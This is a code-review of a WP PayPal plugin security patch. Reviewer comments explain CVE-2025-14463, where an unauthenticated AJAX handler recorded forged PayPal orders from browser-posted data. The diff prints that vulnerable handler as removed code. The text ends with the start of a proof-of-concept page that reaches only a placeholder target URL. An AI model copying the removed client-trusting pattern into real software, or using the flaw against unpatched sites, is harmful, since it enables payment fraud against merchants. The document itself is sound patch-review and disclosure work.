+            $email_recipients = explode(",", $email_options['sale_notification_email_recipient']);
+            foreach($email_recipients as $email_recipient){
+                $to = sanitize_email($email_recipient);
+                if(is_email($to)){
+                    wp_paypal_debug_log("Checkout - Sending a sale notification email to ".$to, true);
+                    $mail_sent = wp_mail($to, $subject, $body);
+                    if($mail_sent == true){
+                        wp_paypal_debug_log("Checkout - Email was sent successfully by WordPress", true);
+                    }
+                    else{
+                        wp_paypal_debug_log("Checkout - Email could not be sent by WordPress", false);
+                    }
+                }
+            }
+            if($type == "html"){
+                remove_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
+            }
+        }
+        remove_filter('wp_mail_from', 'wp_paypal_set_email_from');
+        remove_filter('wp_mail_from_name', 'wp_paypal_set_email_from_name');
+
+        $order_details_data['post_order_id'] = $post_id;
+        do_action('wp_paypal_checkout_order_processed', $payment_data, $order_details_data);
+    } else {
+        wp_paypal_debug_log("Checkout - Order information could not be updated", false);
+        return;
+    }
+    wp_paypal_debug_log("Checkout - Payment processing completed", true, true);
+    return;
+}
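Review bot: this receipt/sale-notification block is a line-for-line copy of the one deleted from wp_paypal_checkout_process_order_handler in wp-paypal-checkout.php further down in this patch, so any later fix to the mailing logic (recipient validation, the html content-type filter dance) has to be made in two places; pulling it into a helper that takes $payment_data and $email_options would stop the two copies drifting. Smaller point: `wp_paypal_debug_log("Sending a purchase receipt email to ...")` is the only log line in the block without the `Checkout - ` prefix every other call here uses, which makes filtering the debug log by stage harder than it needs to be.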
--- a/wp-paypal/wp-paypal-checkout.php
+++ b/wp-paypal/wp-paypal-checkout.php
@@ -38,13 +38,9 @@
 	$cancel_output .= "let cancel_url = temp_cancel_url.replace('&', '&');";
         $cancel_output .= "window.location.replace(cancel_url);";
     }
-    $no_shipping = '';
-    if(isset($atts['no_shipping']) && $atts['no_shipping']=='1'){
-        $no_shipping .= <<<EOT
-        application_context: {
-            shipping_preference: "NO_SHIPPING",
-        },
-EOT;
+    $shipping_preference = 'GET_FROM_FILE';
+    if(isset($atts['shipping_preference']) && $atts['shipping_preference'] == 'NO_SHIPPING'){
+        $shipping_preference = 'NO_SHIPPING';
     }
     $width = '300';
     if(isset($atts['width']) && !empty($atts['width'])){
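Review bot: the `no_shipping` shortcode attribute is removed without a fallback, so every existing `[wp_paypal_checkout ... no_shipping="1"]` button silently switches to `GET_FROM_FILE` after the upgrade and starts asking buyers for a shipping address. Map the old attribute onto the new variable before the new check, e.g. `if(isset($atts['no_shipping']) && $atts['no_shipping']=='1'){ $shipping_preference = 'NO_SHIPPING'; }`, and call out the rename in the changelog.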
@@ -88,6 +84,12 @@
         return __('You need to provide a valid price amount', 'wp-paypal');
     }
     $amount = $atts['amount'];
+    $break_down_amount = 'false';
+    $shipping = '';
+    if(isset($atts['shipping']) && is_numeric($atts['shipping'])){
+        $shipping = $atts['shipping'];
+        $break_down_amount = 'true';
+    }
     $esc_js = 'esc_js';
     $additional_el = '';
     $button_id = 'wppaypalcheckout-button-'.$id;
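Review bot: `is_numeric($atts['shipping'])` accepts negative values and exponent notation (`-5`, `1e2`), and the value is later added to the item amount with parseFloat on the client, so a typo in the shortcode can lower the total rather than raise it. This is site-author input, not a trust boundary, but validating it as a non-negative decimal with at most two places (e.g. `preg_match('/^\d+(\.\d{1,2})?$/', $atts['shipping'])`) would fail loudly at render time instead of producing an order that PayPal rejects for a breakdown mismatch.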
@@ -128,6 +130,11 @@
     $button_code .= '<div id="'.esc_attr($button_id).'" style="'.esc_attr('max-width: '.$width.'px;').'"></div>';
     $button_code .= '</div>';
     $ajax_url = admin_url('admin-ajax.php');
+    /*
+    2022, 2023, 2024 themes seem to convert front-end JavaScript & to & automatically breaking the PayPal button
+    changed the following logic because of this issue: https://core.trac.wordpress.org/ticket/45387#comment:14
+    if(shipping.length !== 0 && !isNaN(shipping)){
+    */
     $button_code .= <<<EOT
     <script>
     jQuery(document).ready(function() {
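Review bot: the comment ends with the bare fragment `if(shipping.length !== 0 && !isNaN(shipping)){` after the trac link, which reads like commented-out code rather than the explanation it is meant to be. State it directly: the `&&` in that combined condition was being entity-encoded by the 2022/2023/2024 block themes, so the check is split into two nested `if`s in onClick below; a reader who does not open the ticket otherwise has no way to know why the nesting exists and may well "simplify" it back.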
@@ -135,6 +142,10 @@
         function initPayPalButton{$id}() {
             var description = {$description_queryselector};
             var amount = {$amount_queryselector};
+            var totalamount = 0;
+            var shipping = "{$esc_js($shipping)}";
+            var currency = "{$esc_js($currency)}";
+            var break_down_amount = {$esc_js($break_down_amount)};
             var checkoutvar = {};
             var custom = {$custom_queryselector};
             var variation = {$variation_queryselector};
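Review bot: `var break_down_amount = {$esc_js($break_down_amount)};` is interpolated unquoted, so it only becomes a JS boolean because the PHP side pins the variable to the two literals `'true'` / `'false'`; esc_js would not protect anything if that ever became a pass-through of a shortcode attribute. Keeping `$break_down_amount` as a real PHP bool and emitting it with `wp_json_encode()` (or adding a one-line comment at the declaration) makes the intent explicit. `shipping` and `currency` are quoted and escaped, which is right.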
@@ -171,10 +182,10 @@
             }
             paypal.Buttons({
                 style: {
-                    layout: '{$layout}',
-                    color: '{$color}',
-                    shape: '{$shape}',
-                    label: '{$label}'
+                    layout: '{$esc_js($layout)}',
+                    color: '{$esc_js($color)}',
+                    shape: '{$esc_js($shape)}',
+                    label: '{$esc_js($label)}'
                 },
                 onInit: function (data, actions) {
                     actions.disable();
@@ -200,32 +211,94 @@
                 onClick: function () {
                     purchase_units[0].description = description.value;
                     purchase_units[0].amount.value = amount.value;
+                    if(break_down_amount){
+                        purchase_units[0].amount.breakdown = {};
+                        purchase_units[0].amount.breakdown.item_total = {};
+                        purchase_units[0].amount.breakdown.item_total.currency_code = currency;
+                        purchase_units[0].amount.breakdown.item_total.value = amount;
+                    }
+                    if(shipping.length !== 0){
+                        if(!isNaN(shipping)){
+                            purchase_units[0].amount.breakdown.shipping = {};
+                            purchase_units[0].amount.breakdown.shipping.currency_code = currency;
+                            purchase_units[0].amount.breakdown.shipping.value = shipping;
+                            totalamount = parseFloat(amount)+parseFloat(shipping);
+                        }
+                    }
+                    if(totalamount > 0){
+                        purchase_units[0].amount.value = String(totalamount);
+                    }
                 },

-                createOrder: function(data, actions) {
-                    return actions.order.create({
-                        purchase_units: purchase_units,
-                        $no_shipping
-                    });
+                createOrder: async function(data, actions) {
+                    var order_data = {
+                        intent: 'CAPTURE',
+                        payment_source: {
+                            paypal: {
+                                experience_context: {
+                                    payment_method_preference: 'IMMEDIATE_PAYMENT_REQUIRED',
+                                    shipping_preference: '{$esc_js($shipping_preference)}',
+                                }
+                            }
+                        },
+                        purchase_units: purchase_units,
+                    };
+                    let post_data = 'action=wppaypalcheckout_pp_api_create_order&data=' + encodeURIComponent(JSON.stringify(order_data));
+                    try {
+                        const response = await fetch('{$ajax_url}', {
+                            method: "post",
+                            headers: {
+                                    'Content-Type': 'application/x-www-form-urlencoded'
+                            },
+                            body: post_data
+                        });
+
+                        const response_data = await response.json();
+
+                        if (response_data.order_id) {
+                            console.log('Create-order API call to PayPal completed successfully');
+                            return response_data.order_id;
+                        } else {
+                            const error_message = response_data.err_msg
+                            console.error('Error occurred during create-order call to PayPal: ' + error_message);
+                            throw new Error(error_message); //This will trigger an alert in the catch block below
+                        }
+                    } catch (error) {
+                        console.error(error.message);
+                        alert('Could not initiate PayPal Checkout - ' + error.message);
+                    }
                 },

-                onApprove: function(data, actions) {
-                    return actions.order.capture().then(function(details) {
-                        var data = {
-                            'action': "wppaypalcheckout_ajax_process_order",
-                            'wppaypalcheckout_ajax_process_order': "1",
-                            'checkoutvar': checkoutvar,
-                            'details': details
-                        };
-                        jQuery.ajax({
-                            url : "{$ajax_url}",
-                            type : "POST",
-                            data : data,
-                            success: function(response) {
-                                $return_output
-                            }
+                onApprove: async function(data, actions) {
+                    console.log('Sending AJAX request for capture-order call');
+                    let pp_bn_data = {};
+                    pp_bn_data.order_id = data.orderID;
+                    pp_bn_data.checkoutvar = checkoutvar;
+
+                    let post_data = 'action=wppaypalcheckout_pp_api_capture_order&data=' + encodeURIComponent(JSON.stringify(pp_bn_data));
+                    try {
+                        const response = await fetch('{$ajax_url}', {
+                            method: "post",
+                            headers: {
+                                'Content-Type': 'application/x-www-form-urlencoded'
+                            },
+                            body: post_data
                         });
-                    });
+
+                        const response_data = await response.json();
+                        if (response_data.success) {
+                            console.log('Capture-order API call to PayPal completed successfully');
+                            $return_output
+                        } else {
+                            const error_message = response_data.err_msg
+                            console.error('Error: ' + error_message);
+                            throw new Error(error_message); //This will trigger an alert in the catch block below
+                        }
+
+                    } catch (error) {
+                        console.error(error);
+                        alert('Order could not be captured. Error: ' + JSON.stringify(error));
+                    }
                 },

                 onError: function (err) {
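Review bot: in onClick, `amount` is used inconsistently: `purchase_units[0].amount.value = amount.value` reads the field's value, but the breakdown sets `item_total.value = amount` and the total is computed with `parseFloat(amount)`. If `amount` is the element returned by the query selector, which the `.value` two lines earlier implies, `item_total.value` becomes an object and `parseFloat` yields NaN, so `totalamount > 0` is never true, the surcharge is dropped from `amount.value` while still present in `breakdown.shipping`, and PayPal rejects the order because the total does not equal the breakdown sum. Use `amount.value` in both places. Separately, the amount posted to `wppaypalcheckout_pp_api_create_order` is still whatever sits in the DOM, so the server-side create handler (not in this excerpt) is the place to check it against the configured price; the capture call now sends only `order_id` and `checkoutvar`, and that is the change that closes the forged-capture path. Minor: `alert('Order could not be captured. Error: ' + JSON.stringify(error))` renders an `Error` as `{}` because `message` is not enumerable; use `error.message` as the create-order branch does.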
@@ -246,24 +319,6 @@
     return $button_code;
 }

-function wp_paypal_checkout_ajax_process_order(){
-    wp_paypal_debug_log('Received a response from frontend', true);
-    if(!isset($_POST['wppaypalcheckout_ajax_process_order'])){
-        wp_die();
-    }
-    wp_paypal_debug_log('Checkout - Received a notification from PayPal', true);
-    $post_data = $_POST;
-    array_walk_recursive($post_data, function(&$v) { $v = sanitize_text_field($v); });
-    wp_paypal_debug_log_array($post_data, true);
-    if(!isset($post_data['details'])){
-        wp_paypal_debug_log("Checkout - No transaction details. This payment cannot be processed.", false);
-        wp_die();
-    }
-    //
-    do_action('wp_paypal_checkout_process_order', $post_data);
-    wp_die();
-}
-
 function wp_paypal_checkout_get_option(){
     $options = get_option('wp_paypal_checkout_options');
     if(!is_array($options)){
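Review bot: deleting `wp_paypal_checkout_ajax_process_order` is the right call; the `array_walk_recursive(... sanitize_text_field ...)` pass was the only treatment the browser-supplied `details` array received before being handed to `wp_paypal_checkout_process_order`, which is exactly what let a fabricated capture be recorded as an order. Two follow-ups belong in the changelog: the `wp_paypal_checkout_process_order` action disappears with it (its registration is dropped in the wp-paypal.php hunk below), so any site code hooked on it stops firing without notice, and the `wppaypalcheckout_ajax_process_order` AJAX action now answers with admin-ajax's default `0`, which anyone who wrote a WAF rule for the old request shape will want to know.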
@@ -288,7 +343,11 @@

 function wp_paypal_checkout_get_empty_options_array(){
     $options = array();
+    $options['test_mode'] = '';
+    $options['app_sandbox_client_id'] = '';
+    $options['app_sandbox_secret_key'] = '';
     $options['app_client_id'] = '';
+    $options['app_secret_key'] = '';
     $options['currency_code'] = '';
     $options['return_url'] = '';
     $options['cancel_url'] = '';
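Review bot: `app_secret_key` and `app_sandbox_secret_key` now live in the same `wp_paypal_checkout_options` array as the public client ID, and the rest of the code reads that array whole via `get_option()`. Anything that prints or serialises it (an option export, a stray `wp_paypal_debug_log_array($options, ...)` with `WP_PAYPAL_DEBUG` on) now leaks the API secret along with the client ID; make sure the settings page renders these two as password fields and that the options array never reaches the debug log.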
@@ -300,291 +359,24 @@
 function is_wp_paypal_checkout_configured(){
     $options = wp_paypal_checkout_get_option();
     $configured = true;
-    if(!isset($options['app_client_id']) || empty($options['app_client_id'])){
-        $configured = false;
-    }
-    if(!isset($options['currency_code']) || empty($options['currency_code'])){
-        $configured = false;
-    }
-    return $configured;
-}
-
-function wp_paypal_checkout_process_order_handler($post_data)
-{
-    $details = $post_data['details'];
-    if(!isset($details['payer'])){
-        wp_paypal_debug_log("Checkout - No payer data. This payment cannot be processed.", false);
-        return;
-    }
-    $payer = $details['payer'];
-    if(!isset($details['purchase_units'][0])){
-        wp_paypal_debug_log("Checkout - No purchase unit data. This payment cannot be processed.", false);
-        return;
-    }
-    $purchase_units = $details['purchase_units'][0];
-    if(!isset($purchase_units['payments']['captures'][0])){
-        wp_paypal_debug_log("Checkout - No payment capture data. This payment cannot be processed.", false);
-        return;
-    }
-    $capture = $purchase_units['payments']['captures'][0];
-    $payment_status = '';
-    if (isset($capture['status'])) {
-        $payment_status = sanitize_text_field($capture['status']);
-        wp_paypal_debug_log("Checkout - Payment Status - " . $payment_status, true);
-    }
-    if (isset($capture['status']['status_details']['reason'])) {
-        $status_reason = sanitize_text_field($capture['status']['status_details']['reason']);
-        wp_paypal_debug_log("Checkout - Reason - " . $status_reason, true);
-    }
-    $payment_data = array();
-    $payment_data['txn_id'] = '';
-    if (isset($capture['id'])) {
-        $payment_data['txn_id'] = sanitize_text_field($capture['id']);
-    } else {
-        wp_paypal_debug_log("Checkout - No transaction ID. This payment cannot be processed.", false);
-        return;
-    }
-    $args = array(
-        'post_type' => 'wp_paypal_order',
-        'meta_query' => array(
-            array(
-                'key' => '_txn_id',
-                'value' => $payment_data['txn_id'],
-                'compare' => '=',
-            ),
-        ),
-    );
-    $query = new WP_Query($args);
-    if ($query->have_posts()) {  //a record already exists
-        wp_paypal_debug_log("An order with this transaction ID already exists. This payment will not be processed.", false);
-        return;
-    }
-    $payer_name = '';
-    $payment_data['given_name'] = '';
-    $payment_data['first_name'] = '';
-    if (isset($payer['name']['given_name'])) {
-        $payment_data['given_name'] = sanitize_text_field($payer['name']['given_name']);
-        $given_name_parts = explode(" ", $payment_data['given_name']);
-        if(isset($given_name_parts[0]) && !empty($given_name_parts[0])){
-            $payment_data['first_name'] = sanitize_text_field($given_name_parts[0]);
-        }
-        $payer_name .= $payment_data['given_name'];
-    }
-    $payment_data['last_name'] = '';
-    if (isset($payer['name']['surname'])) {
-        $payment_data['last_name'] = sanitize_text_field($payer['name']['surname']);
-        $payer_name .= ' '.$payment_data['last_name'];
-    }
-    $payment_data['payer_email'] = '';
-    if (isset($payer['email_address'])) {
-        $payment_data['payer_email'] = sanitize_email($payer['email_address']);
-    }
-    $payment_data['item_names'] = '';
-    $payment_data['description'] = '';
-    if (isset($purchase_units['description'])) {
-        $payment_data['description'] = sanitize_text_field($purchase_units['description']);
-        $payment_data['item_names'] = $payment_data['description'];
-    }
-    $payment_data['mc_gross'] = '';
-    if (isset($purchase_units['amount']['value'])) {
-        $payment_data['mc_gross'] = sanitize_text_field($purchase_units['amount']['value']);
-    }
-    $payment_data['currency_code'] = '';
-    if (isset($purchase_units['amount']['currency_code'])) {
-        $payment_data['currency_code'] = sanitize_text_field($purchase_units['amount']['currency_code']);
-    }
-    $checkoutvar = $post_data['checkoutvar'];
-    $payment_data['custom'] = '';
-    if (isset($checkoutvar['custom']) && !empty($checkoutvar['custom'])) {
-        $payment_data['custom'] = sanitize_text_field($checkoutvar['custom']);
-    }
-    $payment_data['variation'] = '';
-    if (isset($checkoutvar['variation']) && !empty($checkoutvar['variation'])) {
-        $payment_data['variation'] = sanitize_text_field($checkoutvar['variation']);
-    }
-    $payment_data['shipping_name'] = '';
-    if (isset($purchase_units['shipping']['name'])) {
-        $payment_data['shipping_name'] = isset($purchase_units['shipping']['name']['full_name']) ? sanitize_text_field($purchase_units['shipping']['name']['full_name']) : '';
-    }
-    $ship_to = '';
-    $shipping_address = '';
-    if (isset($purchase_units['shipping']['address'])) {
-        $address_street = isset($purchase_units['shipping']['address']['address_line_1']) ? sanitize_text_field($purchase_units['shipping']['address']['address_line_1']) : '';
-        $ship_to .= !empty($address_street) ? $address_street.'<br />' : '';
-        $shipping_address .= !empty($address_street) ? $address_street.', ' : '';
-
-        $address_city = isset($purchase_units['shipping']['address']['admin_area_2']) ? sanitize_text_field($purchase_units['shipping']['address']['admin_area_2']) : '';
-        $ship_to .= !empty($address_city) ? $address_city.', ' : '';
-        $shipping_address .= !empty($address_city) ? $address_city.', ' : '';
-
-        $address_state = isset($purchase_units['shipping']['address']['admin_area_1']) ? sanitize_text_field($purchase_units['shipping']['address']['admin_area_1']) : '';
-        $ship_to .= !empty($address_state) ? $address_state.' ' : '';
-        $shipping_address .= !empty($address_state) ? $address_state.' ' : '';
-
-        $address_zip = isset($purchase_units['shipping']['address']['postal_code']) ? sanitize_text_field($purchase_units['shipping']['address']['postal_code']) : '';
-        $ship_to .= !empty($address_zip) ? $address_zip.'<br />' : '';
-        $shipping_address .= !empty($address_zip) ? $address_zip.', ' : '';
-
-        $address_country = isset($purchase_units['shipping']['address']['country_code']) ? sanitize_text_field($purchase_units['shipping']['address']['country_code']) : '';
-        $ship_to .= !empty($address_country) ? $address_country : '';
-        $shipping_address .= !empty($address_country) ? $address_country : '';
-    }
-    $payment_data['shipping_address'] = $shipping_address;
-    $wp_paypal_order = array(
-        'post_title' => 'order',
-        'post_type' => 'wp_paypal_order',
-        'post_content' => '',
-        'post_status' => 'publish',
-    );
-    wp_paypal_debug_log("Checkout - Inserting order information", true);
-    $post_id = wp_insert_post($wp_paypal_order, true);
-    if (is_wp_error($post_id)) {
-        wp_paypal_debug_log("Checkout - Error inserting order information: ".$post_id->get_error_message(), false);
-        return;
-    }
-    if (!$post_id) {
-        wp_paypal_debug_log("Checkout - Order information could not be inserted", false);
-        return;
-    }
-    $post_updated = false;
-    if ($post_id > 0) {
-        $post_content = '';
-        if(!empty($payment_data['description'])){
-            $post_content .= '<strong>Description:</strong> '.$payment_data['description'].'<br />';
-        }
-        if(isset($payment_data['custom']) && !empty($payment_data['custom'])){
-            $post_content .= '<strong>Custom:</strong> '.$payment_data['custom'].'<br />';
-        }
-        if(isset($payment_data['variation']) && !empty($payment_data['variation'])){
-            $post_content .= '<strong>Variation:</strong> '.$payment_data['variation'].'<br />';
-        }
-        if(!empty($payment_data['mc_gross'])){
-            $post_content .= '<strong>Amount:</strong> '.$payment_data['mc_gross'].'<br />';
-        }
-        if(!empty($payment_data['mc_currency'])){
-            $post_content .= '<strong>Currency:</strong> '.$payment_data['mc_currency'].'<br />';
-        }
-        if(!empty($payer_name)){
-            $post_content .= '<strong>Payer Name:</strong> '.$payer_name.'<br />';
+    if(isset($options['test_mode']) && !empty($options['test_mode'])){
+        if(!isset($options['app_sandbox_client_id']) || empty($options['app_sandbox_client_id'])){
+            $configured = false;
         }
-        if(!empty($payment_data['payer_email'])){
-            $post_content .= '<strong>Email:</strong> '.$payment_data['payer_email'].'<br />';
-        }
-        if(!empty($ship_to)){
-            $ship_to = '<h2>'.__('Ship To', 'wp-paypal').'</h2><br />'.$payment_data['shipping_name'].'<br />'.$ship_to.'<br />';
-        }
-        $post_content .= $ship_to;
-        $post_content .= '<h2>'.__('Payment Data', 'wp-paypal').'</h2><br />';
-        $post_content .= print_r($details, true);
-        $updated_post = array(
-            'ID' => $post_id,
-            'post_title' => $post_id,
-            'post_type' => 'wp_paypal_order',
-            'post_content' => $post_content
-        );
-        $updated_post_id = wp_update_post($updated_post, true);
-        if (is_wp_error($updated_post_id)) {
-            wp_paypal_debug_log("Checkout - Error updating order information: ".$updated_post_id->get_error_message(), false);
-            return;
-        }
-        if (!$updated_post_id) {
-            wp_paypal_debug_log("Checkout - Order information could not be updated", false);
-            return;
-        }
-        if ($updated_post_id > 0) {
-            $post_updated = true;
+        if(!isset($options['app_sandbox_secret_key']) || empty($options['app_sandbox_secret_key'])){
+            $configured = false;
         }
     }
-    //save order information
-    if ($post_updated) {
-        update_post_meta($post_id, '_txn_id', $payment_data['txn_id']);
-        update_post_meta($post_id, '_first_name', $payment_data['first_name']);
-        update_post_meta($post_id, '_last_name', $payment_data['last_name']);
-        update_post_meta($post_id, '_payer_email', $payment_data['payer_email']);
-        update_post_meta($post_id, '_mc_gross', $payment_data['mc_gross']);
-        update_post_meta($post_id, '_payment_status', $payment_status);
-        update_post_meta($post_id, '_custom', $payment_data['custom']);
-        update_post_meta($post_id, '_payment_data', $payment_data);
-        wp_paypal_debug_log("Checkout - Order information updated", true);
-
-        $email_options = wp_paypal_get_email_option();
-        add_filter('wp_mail_from', 'wp_paypal_set_email_from');
-        add_filter('wp_mail_from_name', 'wp_paypal_set_email_from_name');
-        $purchase_email_body = '';
-        if(isset($email_options['purchase_email_enabled']) && !empty($email_options['purchase_email_enabled']) && !empty($payment_data['payer_email'])){
-            $subject = $email_options['purchase_email_subject'];
-            $subject = wp_paypal_do_email_tags($payment_data, $subject);
-            $type = $email_options['purchase_email_type'];
-            $body = $email_options['purchase_email_body'];
-            $body = wp_paypal_do_email_tags($payment_data, $body);
-            if($type == "html"){
-                add_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
-                $body = apply_filters('wp_paypal_email_body_wpautop', true) ? wpautop($body) : $body;
-            }
-            //
-            if(isset($body) && !empty($body)){
-                $purchase_email_body = $body;
-            }
-            //
-            wp_paypal_debug_log("Sending a purchase receipt email to ".$payment_data['payer_email'], true);
-            $mail_sent = wp_mail($payment_data['payer_email'], $subject, $body);
-            if($type == "html"){
-                remove_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
-            }
-            if($mail_sent == true){
-                wp_paypal_debug_log("Checkout - Email was sent successfully by WordPress", true);
-            }
-            else{
-                wp_paypal_debug_log("Checkout - Email could not be sent by WordPress", false);
-            }
+    else{
+        if(!isset($options['app_client_id']) || empty($options['app_client_id'])){
+            $configured = false;
         }
-        if(isset($email_options['sale_notification_email_enabled']) && !empty($email_options['sale_notification_email_enabled']) && !empty($email_options['sale_notification_email_recipient'])){
-            $subject = $email_options['sale_notification_email_subject'];
-            $subject = wp_paypal_do_email_tags($payment_data, $subject);
-            $type = $email_options['sale_notification_email_type'];
-            $body = $email_options['sale_notification_email_body'];
-            $body = wp_paypal_do_email_tags($payment_data, $body);
-            if($type == "html"){
-                add_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
-                $body = apply_filters('wp_paypal_email_body_wpautop', true) ? wpautop($body) : $body;
-            }
-            //
-            if(isset($email_options['sale_notification_email_append_purchase_email']) && !empty($email_options['sale_notification_email_append_purchase_email'])){
-                $appended_content = PHP_EOL.PHP_EOL.'---Purchase Receipt Email---'.PHP_EOL.PHP_EOL;
-                if($type == "html"){
-                    $appended_content = wpautop($appended_content);
-                }
-                $appended_content .= $purchase_email_body;
-                $body .= $appended_content;
-            }
-            //
-            $email_recipients = explode(",", $email_options['sale_notification_email_recipient']);
-            foreach($email_recipients as $email_recipient){
-                $to = sanitize_email($email_recipient);
-                if(is_email($to)){
-                    wp_paypal_debug_log("Checkout - Sending a sale notification email to ".$to, true);
-                    $mail_sent = wp_mail($to, $subject, $body);
-                    if($mail_sent == true){
-                        wp_paypal_debug_log("Checkout - Email was sent successfully by WordPress", true);
-                    }
-                    else{
-                        wp_paypal_debug_log("Checkout - Email could not be sent by WordPress", false);
-                    }
-                }
-            }
-            if($type == "html"){
-                remove_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
-            }
+        if(!isset($options['app_secret_key']) || empty($options['app_secret_key'])){
+            $configured = false;
         }
-        remove_filter('wp_mail_from', 'wp_paypal_set_email_from');
-        remove_filter('wp_mail_from_name', 'wp_paypal_set_email_from_name');
-
-        $details['post_order_id'] = $post_id;
-        do_action('wp_paypal_checkout_order_processed', $payment_data, $details);
-    } else {
-        wp_paypal_debug_log("Checkout - Order information could not be updated", false);
-        return;
     }
-    wp_paypal_debug_log("Checkout - Payment processing completed", true, true);
-    return;
+    if(!isset($options['currency_code']) || empty($options['currency_code'])){
+        $configured = false;
+    }
+    return $configured;
 }
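Review bot: the removed `wp_paypal_checkout_process_order_handler` is the code behind this CVE: `$details = $post_data['details']` is whatever the browser posted, `$capture['id']` taken from it is the only deduplication key, and `mc_gross`, `payer_email`, description and shipping are copied into the `wp_paypal_order` post with nothing but `sanitize_text_field`, so the "transaction" never had to exist at PayPal. Since the mailing tail at the top of this patch matches the deleted one line for line, the new handler in wp-paypal-checkout-api.php was presumably copied from here; check that two dead spots did not come along: `$capture['status']['status_details']['reason']` indexes into a string (`status` is read as a scalar three lines earlier, so that branch never logs), and the `Currency:` line tests `$payment_data['mc_currency']`, which is never set (the value is stored as `currency_code`). The rewritten `is_wp_paypal_checkout_configured()` is correct but now demands a secret in both modes where 1.2.3.41 needed only a client ID, so a site that upgrades without entering a secret loses its buttons (the function returns false and the caller at the end of this patch returns early); the new admin notice only covers the live case, see below.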
--- a/wp-paypal/wp-paypal.php
+++ b/wp-paypal/wp-paypal.php
@@ -1,7 +1,7 @@
 <?php
 /*
   Plugin Name: WP PayPal
-  Version: 1.2.3.41
+  Version: 1.2.3.42
   Plugin URI: https://wphowto.net/wordpress-paypal-plugin-732
   Author: naa986
   Author URI: https://wphowto.net/
@@ -16,7 +16,7 @@

 class WP_PAYPAL {

-    var $plugin_version = '1.2.3.41';
+    var $plugin_version = '1.2.3.42';
     var $db_version = '1.0.2';
     var $plugin_url;
     var $plugin_path;
@@ -47,6 +47,7 @@

     function plugin_includes() {
         include_once('wp-paypal-order.php');
+        include_once('wp-paypal-checkout-api.php');
         include_once('wp-paypal-checkout.php');
         include_once('paypal-ipn.php');
         if(is_admin()){
@@ -66,9 +67,6 @@
         add_filter('manage_wp_paypal_order_posts_columns', 'wp_paypal_order_columns');
         add_action('manage_wp_paypal_order_posts_custom_column', 'wp_paypal_custom_column', 10, 2);
         add_shortcode('wp_paypal', 'wp_paypal_button_handler');
-        add_action('wp_ajax_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');
-        add_action('wp_ajax_nopriv_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');
-        add_action('wp_paypal_checkout_process_order', 'wp_paypal_checkout_process_order_handler');
         add_shortcode('wp_paypal_checkout', 'wp_paypal_checkout_button_handler');
     }
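Review bot: dropping `wp_ajax_nopriv_wppaypalcheckout_ajax_process_order` removes the unauthenticated entry point, but the replacements the front-end calls (`wppaypalcheckout_pp_api_create_order` and `wppaypalcheckout_pp_api_capture_order` in the fetch calls in wp-paypal-checkout.php) must also be registered with `wp_ajax_nopriv_` for guest checkout to work, so they remain reachable without a session. Their registration is not in this excerpt; the property to verify there is that the capture handler takes only `order_id` from `data`, fetches the capture result from PayPal with the stored secret, and builds the order from that response rather than from anything else the client sent.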

@@ -81,15 +79,23 @@
     }

     function admin_notice() {
+        $message = '';
         if (WP_PAYPAL_DEBUG) {  //debug is enabled. Check to make sure log file is writable
             $log_file = WP_PAYPAL_DEBUG_LOG_PATH;
-            if(!file_exists($log_file)){
-                return;
+            if(file_exists($log_file) && !is_writeable($log_file)){
+                $message .= '<div class="updated"><p>' . __('WP PayPal Debug log file is not writable. Please check to make sure that it has the correct file permission (ideally 644). Otherwise the plugin will not be able to write to the log file. The log file can be found in the root directory of the plugin - ', 'wp-paypal') . '<code>' . WP_PAYPAL_URL . '</code></p></div>';
             }
-            if (!is_writeable($log_file)) {
-                echo '<div class="updated"><p>' . __('WP PayPal Debug log file is not writable. Please check to make sure that it has the correct file permission (ideally 644). Otherwise the plugin will not be able to write to the log file. The log file can be found in the root directory of the plugin - ', 'wp-paypal') . '<code>' . WP_PAYPAL_URL . '</code></p></div>';
+        }
+        $options = wp_paypal_checkout_get_option();
+        if(isset($options['app_client_id']) && !empty($options['app_client_id'])){
+            if(!isset($options['app_secret_key']) || empty($options['app_secret_key'])){
+                $message .= '<div class="error"><p>' . __('To use Checkout, WP PayPal plugin requires your Client ID and Secret Key in the settings. Once you have updated the settings, click a PayPal checkout button on your site to ensure everything is working.', 'wp-paypal').'</p></div>';
             }
         }
+        if(empty($message)){
+            return;
+        }
+        echo $message;
     }

     function activate_handler() {
@@ -158,8 +164,20 @@
         if(!is_wp_paypal_checkout_configured()){
             return;
         }
+        $client_id = '';
+        if(isset($options['app_client_id']) && !empty($options['app_client_id'])){
+            $client_id = $options['app_client_id'];
+        }
+        if(isset($options['test_mode']) && $options['test_mode'] == "1"){
+            if(isset($options['app_sandbox_client_id']) && !empty($options['app_sand
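Review bot: `test_mode` is compared with `== "1"` here but with `!empty()` in `is_wp_paypal_checkout_configured()`, so a stored value such as `"on"` or `"true"` counts as test mode for the configured check (sandbox credentials required) while this path still selects the live client ID. Pick one predicate, ideally a small `wp_paypal_checkout_is_test_mode()` helper, and use it in both places.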

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14463 - Payment Button for PayPal <= 1.2.3.41 - Missing Authorization to Unauthenticated Arbitrary Order Creation

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS

